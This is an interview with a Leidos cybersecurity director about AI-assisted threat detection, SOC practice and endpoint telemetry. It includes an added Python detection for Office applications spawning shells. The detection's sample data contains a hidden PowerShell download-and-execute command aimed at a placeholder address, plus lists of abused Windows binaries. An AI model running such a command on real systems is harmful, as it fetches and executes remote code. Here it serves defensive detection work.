The importance of an intelligence-driven approach to cybersecurity
As attackers grow more sophisticated and the perimeter keeps shifting, businesses are scrambling to keep up. Increasingly, they are finding that the old way of protecting organizational systems and assets isn't working. In response, they are turning to modern technologies and techniques and looking for ways to get more value out of the data they already collect. To learn more, we talked to Sean Black, director of cybersecurity at Leidos.
Q: It seems like more organizations are relying on automation, artificial intelligence and machine learning to improve security. What are these technologies that are becoming so important in the cyber realm?
Black: Effective cybersecurity relies on having good data and making optimum use of that data. Technologies and processes with roots in automation, AI and machine learning can help organizations make good use of that data.
One of the first areas we saw AI and machine learning adopted within the cybersecurity space was with malware. It's a great technology that helps us build and train models to look for suspicious files. For example, based on the attributes of a specific file, the model could tell you with a high degree of certainty whether it is similar to other known malware.
As AI systems gain more experience and deal with more data sets, you can do even more with them. For example, the system may decrease the priority of an alert if a high percentage of all prior alerts with similar characteristics were deemed false positives by analysts. If it can incorporate additional metadata like an IP address, domain, or URL, it can provide even more accurate guidance to the analyst. For example, for a particular alert, the system may be able to direct an analyst to use a specific tool, task or other command, based on what it has learned from ingesting information from historical tickets.
Q: What is the best way to capture information from logs and analyst findings to add to the body of knowledge for these systems?
Black: There is fantastic logging happening in the cloud, but it's to the point where you can't really consume it all, so you have to find a way to determine what's valuable. In general, this is an area within the cybersecurity domain that hasn't been addressed as well as it should be. Some organizations use a knowledge management solution, while others are using case management or integrated ticketing systems. But these only go so far, so you often need to customize them.
That's what we have done for some of our customers. We have put custom fields into a ticketing system, for example, to capture important information like whether the ticket represented a true or false positive; which tools were used; what phase or phases of the cyber kill chain were involved; what threat vector was used; and what tactics, techniques and procedures (TTPs) the adversary used.
Q: How is the Security Operations Center (SOC) evolving in its protection against cyberthreats today?
Black: One of the most important ways that SOCs can help is by fostering communication. When bad things happen on a network, it can become very stressful, and that means it's critical for everybody to have a good understanding of what's happening and avoid miscommunication. All of this can become more difficult when the SOC is distributed. It means that you may have people with different types of expertise in different pockets of a SOC, and they have to find ways to share knowledge, engage one another, and foster innovation and creativity across those boundaries. It's a dance, but it's a dance worth doing, because getting it right helps ensure common processes, procedures, and TTPs across all locations or offices, a culture and sense of team that spans the entire SOC, and an environment that motivates and supports sharing and innovation.
Q: What do these things we've been discussing — automation, AI, machine learning, capturing information and SOCs — have in common?
Black: They represent what we call an intelligence-driven approach to cybersecurity. It's an approach that uses every resource possible as intelligently as possible, with the help of technology, to do battle on the cybersecurity front. And ideally, you will use all of these tools.
Q: What challenges does the inevitable blending of new infrastructure, cloud-based infrastructure and legacy systems bring to defending against cyberthreats?
Black: Every organization has some infrastructure and systems that weren't built with modern cybersecurity in mind. That's a reality, even though anything organizations are buying today is more modern. But you can get some level of information from legacy applications and hardware, even if it's just what network connections they are making, what they are communicating with and potentially, which users are logging in. Even with only that information, you can apply artificial intelligence and machine learning to start looking for anomalous behavior. It might not provide the same level of value you would get with modern technology, but there is definitely value. It's really about trying to find out what data you can get and use it as effectively as possible.
Q: Cybersecurity protection threats and techniques seem to change constantly. How can businesses keep up?
Black: Follow the data. There is so much activity today happening on the endpoint — laptops, desktops, sensors, mobile devices, and virtual endpoints scattered across the cloud — that modern operating systems and endpoint monitoring tools can easily log and forward. Network-based logs and alerts are still incredibly useful, but with the increasing challenges posed by encryption and the rise of perimeterless environments, endpoint data tends to provide a far better picture of events occurring across an enterprise.
Collecting relevant endpoint information provides visibility into processes that are running, and who is kicking off those processes and sub-processes. If you have this type of information and the right systems in place, you would easily recognize an instance where somebody opened up a PowerPoint that spawned a PowerShell command and started running commands on the command line – a combination of events that shouldn't be happening.
But that brings up another challenge: You can't analyze every input and piece of data; it would be hard to manage and very expensive. It's important to find effective ways to capture and analyze only the data you need. Remember, not all data is created equal.
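The PowerPoint-spawns-PowerShell scenario Black describes is straightforward to turn into a detection once process-creation telemetry (parent PID, image path, command line, user) is being collected. The following is an added editorial example, not code from the interview or from Leidos: it walks the parent chain of each interpreter launch so that indirect chains such as PowerPoint -> cmd.exe -> powershell.exe are caught, not just direct children. The event records, host name, user and the TEST-NET address 192.0.2.10 in the command line are all constructed for illustration, and the application and interpreter name lists are assumptions to be tuned to the estate being monitored.

```python
"""Flag command interpreters whose process ancestry includes an Office
application, using process-creation telemetry.  The events below are
constructed for illustration; they are not real endpoint logs."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Document handlers that have no business launching a shell (assumption:
# adjust to the applications actually deployed in your environment).
OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
# Interpreters and living-off-the-land binaries worth alerting on (assumption).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


@dataclass(frozen=True)
class ProcEvent:
    ts: str        # ISO-8601 creation time as logged by the endpoint agent
    host: str
    pid: int
    ppid: int
    image: str     # full image path
    cmdline: str
    user: str


def basename(path: str) -> str:
    """Lower-cased file name, tolerant of either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


Key = Tuple[str, int]  # (host, pid) uniquely identifies a process per host


def office_ancestor(ev: ProcEvent, by_pid: Dict[Key, ProcEvent],
                    max_depth: int = 8) -> Optional[ProcEvent]:
    """Walk parent links on the same host and return the first Office
    ancestor, or None.  Depth is capped so a corrupt or cyclic parent
    chain cannot loop forever."""
    cur = ev
    for _ in range(max_depth):
        parent = by_pid.get((cur.host, cur.ppid))
        if parent is None:
            return None
        if basename(parent.image) in OFFICE_APPS:
            return parent
        cur = parent
    return None


def detect_office_spawn(events: List[ProcEvent]) -> List[dict]:
    """Return one finding per interpreter launch that has an Office ancestor.

    Events are processed in creation order and the PID table is updated only
    after each lookup, so a parent resolves to the most recent process that
    held that PID before the child started (handles PID reuse)."""
    by_pid: Dict[Key, ProcEvent] = {}
    findings = []
    for e in sorted(events, key=lambda x: x.ts):
        if basename(e.image) in INTERPRETERS:
            anc = office_ancestor(e, by_pid)
            if anc is not None:
                findings.append({
                    "host": e.host, "user": e.user, "pid": e.pid,
                    "child": basename(e.image), "cmdline": e.cmdline,
                    "office_parent": basename(anc.image),
                    "office_pid": anc.pid,
                })
        by_pid[(e.host, e.pid)] = e
    return findings


def sample_events() -> List[ProcEvent]:
    """Constructed telemetry: one benign PowerShell launch from Explorer and
    one PowerPoint -> cmd.exe -> powershell.exe chain."""
    h, u = "ws-017", "CORP\\alice"
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    payload = "powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')\""
    return [
        ProcEvent("2024-03-05T09:00:00Z", h, 4120, 1000, r"C:\Windows\explorer.exe", "explorer.exe", u),
        ProcEvent("2024-03-05T09:01:10Z", h, 6001, 4120, ps, "powershell.exe", u),  # benign, user-launched
        ProcEvent("2024-03-05T09:02:00Z", h, 5212, 4120, r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE", 'POWERPNT.EXE "Q3 results.pptx"', u),
        ProcEvent("2024-03-05T09:02:31Z", h, 5300, 5212, r"C:\Windows\System32\cmd.exe", "cmd.exe /c " + payload, u),
        ProcEvent("2024-03-05T09:02:32Z", h, 5344, 5300, ps, payload, u),
    ]


if __name__ == "__main__":
    for f in detect_office_spawn(sample_events()):
        print(f"[{f['host']}] {f['office_parent']}({f['office_pid']}) -> "
              f"{f['child']}({f['pid']}) as {f['user']}: {f['cmdline']}")
```

Run against the constructed sample, the detection reports the cmd.exe child of PowerPoint and the PowerShell grandchild, and stays silent on the PowerShell session the user opened directly from Explorer. In production the same logic would run over the agent's event stream rather than an in-memory list, and the real tuning work is in the two name sets: too narrow and an attacker swaps in another binary, too broad and the analysts drown in the exact kind of low-value volume Black warns about.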
Q: What should businesses look for in a partner to help them keep on top of cyber threats?
Black: Choose a vendor with a lot of experience both in cybersecurity and your sector. Also, make sure the vendor is flexible enough to think out of the box, along with a sound methodology and framework. The vendor should also have good relationships with all major cybersecurity vendors and leverage automation as much as possible. One way to determine if a vendor is a good match is to see how it has approached cybersecurity in its own company.